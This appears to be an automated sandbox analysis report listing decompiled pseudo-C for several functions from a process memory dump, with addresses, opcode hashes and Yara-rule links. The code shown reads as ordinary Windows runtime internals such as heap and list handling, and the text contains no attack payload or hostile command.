                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B837F5, Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E04B837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04B62280(_t6, 0x4c38550);
				}
				_t29 = E04B8387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04B5FFB0(0x4c38550, _t27, 0x4c38550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                    0x04b837fa
                                                    0x04b837fc
                                                    0x04b83805
                                                    0x04b83808
                                                    0x04b83808
                                                    0x04b83814
                                                    0x04b83818
                                                    0x04b83846
                                                    0x04b83848
                                                    0x04b8384b
                                                    0x04b8384b
                                                    0x04b83852
                                                    0x00000000
                                                    0x04b83854
                                                    0x04b83856
                                                    0x00000000
                                                    0x00000000
                                                    0x04b83863
                                                    0x00000000
                                                    0x04b83863
                                                    0x04b8381a
                                                    0x04b8381a
                                                    0x04b8381f
                                                    0x04b8386e
                                                    0x04b8386e
                                                    0x04b83871
                                                    0x04b83873
                                                    0x04b83873
                                                    0x04b83868
                                                    0x00000000
                                                    0x04b83868
                                                    0x04b83821
                                                    0x04b83826
                                                    0x00000000
                                                    0x00000000
                                                    0x04b83828
                                                    0x04b8382a
                                                    0x04b83841
                                                    0x00000000
                                                    0x04b83841

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5775705f9e9215f6d6b0eb92678a5bfb81008280144fa80e55326b6a0e41c14e
                                                    • Instruction ID: 4414126b8071c7b131fc16d705afea52379c13faa31a29d2e21780150c16cb0e
                                                    • Opcode Fuzzy Hash: 5775705f9e9215f6d6b0eb92678a5bfb81008280144fa80e55326b6a0e41c14e
                                                    • Instruction Fuzzy Hash: 260122B2A026109BD337AB1AD900E26BBE6DF81F6071550EDEC0A8B210EB35F800C7C0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7002D, Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B7002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04B67D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04B67D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04B67D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04B67D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                    0x04b70032
                                                    0x04b70037
                                                    0x04b70043
                                                    0x04bb4b3a
                                                    0x04b70049
                                                    0x04b70049
                                                    0x04b70049
                                                    0x04b7004e
                                                    0x04b70053
                                                    0x04bb4b48
                                                    0x04bb4b5a
                                                    0x04bb4b4a
                                                    0x04bb4b53
                                                    0x04bb4b53
                                                    0x04bb4b5f
                                                    0x00000000
                                                    0x04bb4b61
                                                    0x00000000
                                                    0x04bb4b61
                                                    0x04b70059
                                                    0x04b70059
                                                    0x04b70060
                                                    0x04bb4b6f
                                                    0x04bb4b6f
                                                    0x04b70069
                                                    0x04bb4b83
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4b90
                                                    0x04bb4b9b
                                                    0x04bb4b9b
                                                    0x04bb4ba4
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4baa
                                                    0x00000000
                                                    0x04b7006f
                                                    0x04b7006f
                                                    0x00000000
                                                    0x04b7006f
                                                    0x04b70069

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction ID: 3fe18aec1d91bfe77ae174d0976b9c60f95fa6ba86d4c15700f4a0fb94d9902d
                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction Fuzzy Hash: CA11E1722016848FE732AB38C954B757794FB417ACF0900E2DE5587693EB68F841D2A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5766D, Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E04B5766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04B7F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04B7F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04B64620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                    0x04b57672
                                                    0x04b5767f
                                                    0x04b57689
                                                    0x04b576de
                                                    0x04b576de
                                                    0x04b5768b
                                                    0x04b57691
                                                    0x04b57693
                                                    0x04b57697
                                                    0x00000000
                                                    0x04b57699
                                                    0x04b576a8
                                                    0x00000000
                                                    0x04b576aa
                                                    0x04b576ad
                                                    0x04b576b1
                                                    0x00000000
                                                    0x04b576b3
                                                    0x04b576b3
                                                    0x04b576b5
                                                    0x04b576ba
                                                    0x04b576bc
                                                    0x04b576bc
                                                    0x04b576c0
                                                    0x00000000
                                                    0x04b576c2
                                                    0x04b576ce
                                                    0x04b576ce
                                                    0x04b576c0
                                                    0x04b576b1
                                                    0x04b576a8
                                                    0x04b57697
                                                    0x04b576d9

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction ID: dddccdde3c73a85eeaf5982c1a190a62e94429dfd6e30d38e21941832e911077
                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction Fuzzy Hash: 13018432700119AFE720AE5EDC51F6BB7ADEB84760F2505A4BD19CB260DE30ED01A7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B49080, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E04B49080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4c385ec;
				E04B62280(_t48, 0x4c385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04B5FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4c3538c; // 0xcaad68
					if( *_t84 != 0x4c35388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4c1f6e8);
						E04B9D0E8(0x4c385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04C188F5(_t80, _t85, 0x4c35388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4c386c0; // 0xc907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4c386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04B62280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04C188F5(0x4c385ec, _t85, 0x4c35388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04B8AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4c3b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4c384c0;
																			if(_t82 >=  *0x4c384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04C19063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04B4922A(_t99);
										_t64 = E04B67D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04C18B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4c386c0; // 0xc907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4c386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4c386bc;
													_t87 = 0x4c386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04B49240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4c386c4;
												_t87 = 0x4c386c0;
												L27:
												E04B79B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04B9D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4c35388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4c3538c = _t51;
						goto L6;
					}
				}
			}




















                                                    0x04b49082
                                                    0x04b49083
                                                    0x04b49084
                                                    0x04b49085
                                                    0x04b49087
                                                    0x04b49096
                                                    0x04b49098
                                                    0x04b49098
                                                    0x04b4909e
                                                    0x04b490a8
                                                    0x04b490e7
                                                    0x04b490e7
                                                    0x04b490aa
                                                    0x04b490b0
                                                    0x04b490b7
                                                    0x04b490bd
                                                    0x04b490dd
                                                    0x04b490e6
                                                    0x04b490bf
                                                    0x04b490bf
                                                    0x04b490c7
                                                    0x04b490cf
                                                    0x04b490f1
                                                    0x04b490f2
                                                    0x04b490f4
                                                    0x04b490f5
                                                    0x04b490f6
                                                    0x04b490f7
                                                    0x04b490f8
                                                    0x04b490f9
                                                    0x04b490fa
                                                    0x04b490fb
                                                    0x04b490fc
                                                    0x04b490fd
                                                    0x04b490fe
                                                    0x04b490ff
                                                    0x04b49100
                                                    0x04b49102
                                                    0x04b49107
                                                    0x04b4910c
                                                    0x04b49110
                                                    0x04b49113
                                                    0x04b49115
                                                    0x04b49136
                                                    0x04b4913f
                                                    0x04b49143
                                                    0x04ba37e4
                                                    0x04ba37e4
                                                    0x04b49117
                                                    0x04b49117
                                                    0x04b4911d
                                                    0x00000000
                                                    0x04b4911f
                                                    0x04b4911f
                                                    0x04b49125
                                                    0x00000000
                                                    0x04b49127
                                                    0x04b4912d
                                                    0x04b49130
                                                    0x04b49134
                                                    0x04b49158
                                                    0x04b4915d
                                                    0x04b49161
                                                    0x04b49168
                                                    0x04ba3715
                                                    0x04b4916e
                                                    0x04b4916e
                                                    0x04b49175
                                                    0x04b49177
                                                    0x04b4917e
                                                    0x04b4917f
                                                    0x04b49182
                                                    0x04b49182
                                                    0x04b49187
                                                    0x04b49187
                                                    0x04b4918a
                                                    0x04b4918d
                                                    0x04b4918f
                                                    0x04b49192
                                                    0x04b49195
                                                    0x04b49198
                                                    0x04b49198
                                                    0x04b49198
                                                    0x04b4919a
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba371f
                                                    0x04ba3721
                                                    0x04ba3727
                                                    0x04ba372f
                                                    0x04ba3733
                                                    0x04ba3735
                                                    0x04ba3738
                                                    0x04ba373b
                                                    0x04ba373d
                                                    0x04ba3740
                                                    0x00000000
                                                    0x04ba3746
                                                    0x04ba3746
                                                    0x04ba3749
                                                    0x00000000
                                                    0x04ba374f
                                                    0x04ba374f
                                                    0x04ba3751
                                                    0x04ba3757
                                                    0x04ba3759
                                                    0x04ba375c
                                                    0x04ba375c
                                                    0x04ba375e
                                                    0x04ba375e
                                                    0x04ba3761
                                                    0x04ba3764
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3766
                                                    0x04ba3768
                                                    0x04ba37a3
                                                    0x04ba37a3
                                                    0x04ba37a5
                                                    0x04ba37a7
                                                    0x04ba37ad
                                                    0x04ba37b0
                                                    0x04ba37b2
                                                    0x04ba37bc
                                                    0x04ba37c2
                                                    0x04ba37c2
                                                    0x04ba37b2
                                                    0x04b49187
                                                    0x04b49187
                                                    0x04b4918a
                                                    0x04b4918d
                                                    0x04b4918f
                                                    0x04b49192
                                                    0x04b49195
                                                    0x00000000
                                                    0x04b49195
                                                    0x00000000
                                                    0x04ba376a
                                                    0x04ba376a
                                                    0x04ba376a
                                                    0x04ba376c
                                                    0x04ba376c
                                                    0x04ba376f
                                                    0x04ba3775
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3777
                                                    0x04ba3779
                                                    0x04ba3782
                                                    0x04ba3787
                                                    0x04ba3789
                                                    0x04ba3790
                                                    0x04ba3790
                                                    0x04ba378b
                                                    0x04ba378b
                                                    0x04ba378b
                                                    0x04ba3792
                                                    0x04ba3795
                                                    0x00000000
                                                    0x04ba3795
                                                    0x00000000
                                                    0x04ba3779
                                                    0x04ba3798
                                                    0x00000000
                                                    0x04ba3798
                                                    0x00000000
                                                    0x04ba3768
                                                    0x04ba379b
                                                    0x04ba379b
                                                    0x04ba3751
                                                    0x04ba3749
                                                    0x00000000
                                                    0x04ba3740
                                                    0x04b491a0
                                                    0x04b491a3
                                                    0x04b491a9
                                                    0x04b491b0
                                                    0x00000000
                                                    0x04b491b0
                                                    0x04b49187
                                                    0x04b491b4
                                                    0x04b491b4
                                                    0x04b491bb
                                                    0x04b491c0
                                                    0x04b491c5
                                                    0x04b491c7
                                                    0x04ba37da
                                                    0x04b491cd
                                                    0x04b491cd
                                                    0x04b491cd
                                                    0x04b491d2
                                                    0x04b491d5
                                                    0x04b49239
                                                    0x04b49239
                                                    0x04b491d7
                                                    0x04b491db
                                                    0x04b491e1
                                                    0x04b491e7
                                                    0x04b491fd
                                                    0x04b49203
                                                    0x04b4921e
                                                    0x04b49223
                                                    0x00000000
                                                    0x04b49205
                                                    0x04b49205
                                                    0x04b49208
                                                    0x04b4920c
                                                    0x04b49214
                                                    0x04b49214
                                                    0x04b4920c
                                                    0x04b491e9
                                                    0x04b491e9
                                                    0x04b491ee
                                                    0x04b491f3
                                                    0x04b491f3
                                                    0x04b491f3
                                                    0x04b491e7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b49134
                                                    0x04b49125
                                                    0x04b4911d
                                                    0x04b4914e
                                                    0x04b490d1
                                                    0x04b490d1
                                                    0x04b490d3
                                                    0x04b490d6
                                                    0x04b490d8
                                                    0x00000000
                                                    0x04b490d8
                                                    0x04b490cf

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d41fcdd3dd37732bab43b8b80007a950e64ffa51727b0e117fa77c8d1a3aa28
                                                    • Instruction ID: c71a6e64b472fe3e6fa3665e27b04ca32fa9add5cfe94e094a425c768b8442d5
                                                    • Opcode Fuzzy Hash: 8d41fcdd3dd37732bab43b8b80007a950e64ffa51727b0e117fa77c8d1a3aa28
                                                    • Instruction Fuzzy Hash: 8B01AFB2601604AFE7299F28D840B22BBF9EB85725F2540A6E5059B791D378FC41DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BDC450, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E04BDC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04B89910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04B895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04B895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04B895D0();
				return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                    0x04bdc458
                                                    0x04bdc45d
                                                    0x04bdc466
                                                    0x04bdc468
                                                    0x04bdc469
                                                    0x04bdc46a
                                                    0x04bdc46b
                                                    0x04bdc46e
                                                    0x04bdc46f
                                                    0x04bdc471
                                                    0x04bdc476
                                                    0x04bdc476
                                                    0x04bdc47c
                                                    0x04bdc47e
                                                    0x04bdc480
                                                    0x04bdc480
                                                    0x04bdc483
                                                    0x04bdc484
                                                    0x04bdc486
                                                    0x04bdc488
                                                    0x04bdc48f
                                                    0x04bdc491
                                                    0x04bdc493
                                                    0x04bdc493
                                                    0x04bdc48f
                                                    0x04bdc498
                                                    0x04bdc49e
                                                    0x04bdc4ad
                                                    0x04bdc4ad
                                                    0x04bdc4b2
                                                    0x04bdc4b4
                                                    0x04bdc4cd

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction ID: d1ae8975fb45344bcb20f22f901b13e5fcb56c5486b34ef517fae9bb2d2be80f
                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction Fuzzy Hash: AB0192B2140605BFEB21AF69CC80EB2FB7DFF54798F1045A9F11542560DB25BCA1CAA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C14015, Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E04C14015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04B62280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04B62280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4c386ac);
					E04B4F900(0x4c386d4, _t28);
					E04B5FFB0(0x4c386ac, _t28, 0x4c386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04B5FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                    0x04c1401a
                                                    0x04c1401e
                                                    0x04c14023
                                                    0x04c14028
                                                    0x04c14029
                                                    0x04c1402b
                                                    0x04c1402f
                                                    0x04c14043
                                                    0x04c14046
                                                    0x04c14051
                                                    0x04c14057
                                                    0x04c1405f
                                                    0x04c14062
                                                    0x04c14067
                                                    0x04c1406f
                                                    0x04c1407c
                                                    0x04c1407c
                                                    0x04c1408c
                                                    0x04c1408c
                                                    0x04c14097

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 075d22e2da72cca715c363ce6e83057c26866e609b255bdbfb71ba3292d4ea7c
                                                    • Instruction ID: 5eea7853ee9bf83cdfcf8aff559a30f8f1f51fcc9824b740c1abbb074feab8c7
                                                    • Opcode Fuzzy Hash: 075d22e2da72cca715c363ce6e83057c26866e609b255bdbfb71ba3292d4ea7c
                                                    • Instruction Fuzzy Hash: 1E0184712416457FE615BB69CD80E23F7ACEB45758B000665B50883A21CB28FD11C6E4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C014FB, Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E04C014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04B8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04B67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x04c014fb
                                                    0x04c014fb
                                                    0x04c0150a
                                                    0x04c01514
                                                    0x04c01519
                                                    0x04c0151b
                                                    0x04c01526
                                                    0x04c0152c
                                                    0x04c01534
                                                    0x04c01537
                                                    0x04c0153a
                                                    0x04c01545
                                                    0x04c01557
                                                    0x04c01547
                                                    0x04c01550
                                                    0x04c01550
                                                    0x04c01562
                                                    0x04c01563
                                                    0x04c01565
                                                    0x04c0156a
                                                    0x04c0157f

                                                    Memory Dump Source
